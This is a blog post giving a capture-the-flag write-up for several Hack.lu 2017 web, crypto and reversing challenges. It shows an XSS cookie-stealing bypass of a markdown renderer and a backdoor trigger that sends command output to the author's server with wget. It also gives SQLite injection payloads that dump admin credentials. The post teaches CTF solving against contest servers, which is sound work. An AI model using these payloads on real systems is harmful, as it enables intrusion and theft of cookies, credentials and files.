Open in app

Sign in

Write

Sign in

Văn Hòa Nguyễn
tradahacking
Published in
6 min readOct 19, 2017

--

Hack.lu 2017

(Misc, Web) DnSoSecure — by kunte_, utnubu -100 (+ 100)

We found this Flag-Submission-Service that is used by the OTHER-SIDE. Try to get it to submit the flag to you!

View source give us the source of this challenge:

Index file validating the input text and do the secret:

So this problem is faking DNS and *bypass* the dnssec checker function, after a while trying to crack that public key, i found out that the source contain .git, checkout the branch eddb23375ea4e08c67a63088ea08b4d5fc18a406 give us the private keys and that’s enough to build a dns server for this problem.

(Web, Rev) Triangle — by kunte_ -100 (+ 64)

Everything is controlled by the Triangle!

It’s just a basic js-only webpage which check login by following function:

These methods defined in secret.js, simple deobfucating give us:

So both test_pw and enc_pw use Unicorn to emulate some ARM code, obtaining these memory images and load into IDA give us:

test_pw assembly:

enc_pw assembly:

Rewrite these functions using php:

Then it’s easy to revert these functions:

And then it’s easy to get the code:

MPmVH94PTH7hhafgYahYaVfKJNLRNQLZ

(Web) Mistune — by kunte_ -150 (- 18)

Markdown parsers are fun. Now click here and steal the cookie!

It’s a markdown-rendering service which we can test output of their internal markdown renderer and can submit messages to admin using markdown.

Try to steal the cookie!

We use mistune.Renderer(escape=True, hard_wrap=True)

The admin will look at your converted Markdown.

The admin will click on links (<a/>).

So this problem is definitely XSS and require us to obtain cookie of admin. Finding source of mistune give us

So javascript: scheme urls will be black out, but we can easily bypass that by using carriage return character "javascript\r:document.location.href=(...)+document.cookie", and then just wait for the flag, we can input that carriage return by running command in console:

(Crypto) b64 — by Sceptic -100 (+ 66)

Taking part in elite, exclusive groups entails being able to hide secrets from the lesser folk and only provide it to the gifted. Our intern recently proposed a solution to do just that.

nc flatearth.fluxfingers.net 1718

Download

Problem source:

For each new session, the server create a new random message, allow us to decode MAX_TRIES message with provided crypt function and then filter only base64 compatible characters into a new string, remove the last character if that string length divide 4 remain 1, and finally base64-decode that string.

We can easily findout the secret message by enumerating each byte, except for byte 0 and 4 we need to enumerate 2 bytes, but only enumerating the 4 MSBs are enough, so 1 + 256*2 + 16*6 = 609 tries in worst case, which’s very enough.

(Crypto) prime enigma — by midao — 50 (+ 100)

Hey there fellow lizard how nice of you to drop by! Did you know those filthy humans really think that some numbers have special meanings? Seven, 13 and for some strange reason even 9000. Go and show them that a good prime does not make a secure cryptosystem!

Link

This problem encrypt message by using some big exponent as private key, provide us the cipher message and a hint number.

Looking at ciphertext.txt show that B == p - 1, so g^d = -1 mod p, so d maybe (p-1)/2, just try it and that give us the flag:

flag{If you whistle while you’re pissing, you have two minds, where one is quite sufficient. If you have two minds, you are at war with yourself. If you are at war with yourself, it is easy for an external force to defeat you. This is why Mong-tse wrote. ‘A man must destroy himself before others can destroy him.’ | Lorem ipsum dolor sit amet, consectetur adipisici elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamaco laboris nisi …}

(Crypto) salsa — by SLAZ — 200 (+ 15)

The Flat Earth Society has a secret information storage. There is enough evidence in it, to convince every member of them, that the earth is round. Unfortunately, we don’t have the key …
nc flatearth.fluxfingers.net 1721

Download

This problem provide an encryption named salsa20, send the message with flag encrypted, and allow us to encrypt 8192 bytes of data.

Bellowing is the main implementation of the encryption:

It clearly shows us that this encryption is just xor the input buffer with a keystrem, and that keystream is shifted by one for each new cryption (controlled by si).

C1 = M1 xor Keystream1

C2 = M2 xor Keystream2

Keystream2 = Keystream1[1:]

So,

M1[1:] = C1[1:] xor Keystream1[1:]

= C1[1:] xor Keystream2

= C1[1:] xor C2 xor M2

That’s enough to code the solver:

(Web, Pwn) Indianer — by hasiH451–200 (+ 36)

Try to enter this Tipi

Download

The archive provides us a shared file backdoor.so, which override strlen function:

So we can trigger the backdoor by first including ndex.html in the url, in order to execute apr_hook_debug_enabled = system(sa); line, all the parent if must be satisfied:

if ( trigger & 1 )

trigger is an increasing number, so this will trigger once every 2 requests.

if ( g_idx[0] > 1u )

g_idx[0] is also an increasing number whenever the first if is satisfied.

slen = old_strlen(s_1, (const char *)slen);
s = (char *)memmem(s_1, slen, needle, 34uLL);
if ( s )

so it will search for all 34 bytes of needle,

if ( *shell_buf == ‘=’ )

check if that buffer continues with =,

while ( 1 )
{
  slen = '_';
  v6 = strchr(sa, '_');
  if ( !v6 )
    break;
  *v6 = ' ';
}
apr_hook_debug_enabled = system(sa);

replace all _ with space and then execute that buffer.

So let’s calculate the needle at that state:

Which give us

eqeqeqbnbnbnbnbkwkwkwkwhththththqeq

And then finally we can start netcat on our server and use wget to send commands output to our server:

file_get_contents('https://indianer.flatearth.fluxfingers.net/ndex.html');
for($i=0;$i<40;$i++) {
  echo file_get_contents('https://indianer.flatearth.fluxfingers.net/eqeqeqbnbnbnbnbkwkwkwkwhththththqeq=wget_http://$server:$port/`'.str_replace(' ','_','cat /var/www/flag.txt').'`');
}

(Misc, Web) flatscience — by Staubfinger — 100 (+ 90)

The Professor on Flat Earth is Prof. Flux Horst. Only for bragging he made his own Blog showcasing his favorite Papers. Beeing the only Professor, he thinks he is the smartest Person arround the Plate. Can you proof him wrong and log into his Admin-Panel?
Link

robots.txt provides us:

User-agent: *
Disallow: /login.php
Disallow: /admin.php

The login.php source contain:

<! — TODO: Remove ?debug-Parameter! →

So let’s try appending ?debug to that file, which show us the source code:

That’s clearly sqlite injection, we can obtain the schema by

usr=’ union select 1,(select sql from sqlite_master limit 1) — &pw=

gives us

CREATE TABLE Users(
id int primary key,
name varchar(255),
password varchar(255),
hint varchar(255)
)

query the admin credentials:

usr=’ union select 1,(select id || ‘; ‘ || name || ‘; ‘ || password || ‘; ‘ || hint from Users limit 1) — &pw=

gives us:

1; admin; 3fab54a50e770d830c0416df817567662a9dc85c; my fav word in my fav paper?!

So just scrape all the pdfs and look for the password

foreach(glob("pdfs/*.pdf") as $pdf){
  passthru("pdftotext $pdf");
  $txt = file_get_contents(substr($pdf, 0, -4) . ".txt");
  preg_match_all("@[^\n\r\t\s]+@", $txt, $m);
  foreach($m[0] as $l) {
    if (sha1($l."Salz!")=="3fab54a50e770d830c0416df817567662a9dc85c") {
      die($l);
    }
  }
}

Password is ThinJerboa, logging into admin.php give us the flag:

flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}

(Rev) The Maya Society — by bykunte_ — 50 (+ 91)

Maya society was broken into a class structure with four main levels: the nobility (Maya almehenob), the priesthood (Maya ahkinob), the common people (Maya ah chembal uinieol), and the slaves (Maya ppencatob). The most powerful of the ruling elite was known as the halach uinic. The halach uinic are alive and still secretly hold meetings today. You have to reverse engineer their communication and infiltrate the ruling elite. Link

The webpage has a download button which provide a launcher file:

$ file launcher
launcher: ELF 64-bit LSB shared object, x86–64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86–64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=464269c36073a8820e69146b00cc8e68d1f50718, stripped

loading with IDA give us

So this main file will do something starting from a string which create from current date, the original webpage contains © 2012 which hint us that this webpage is created in 2012, so i create a simple C file to use with LD_PRELOAD to fake the time:

#include <stdlib.h>
#include <stdio.h>
int time(int) {
  return atoi(getenv("CURR_TIME"));
}

and then just try every timestamp starting from 2012–01–01 will give us the password @ 2012–12–21:

$ CURR_TIME=1356066000 LD_PRELOAD=$(pwd)/fake.so ./launcher
flag{e3a03c6f3fe91b40eaa8e71b41f0db12}
Ctf
Cryptography
Web Security
Software Security

--

--

Văn Hòa Nguyễn
tradahacking

Written by Văn Hòa Nguyễn

228 Followers
Editor for

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams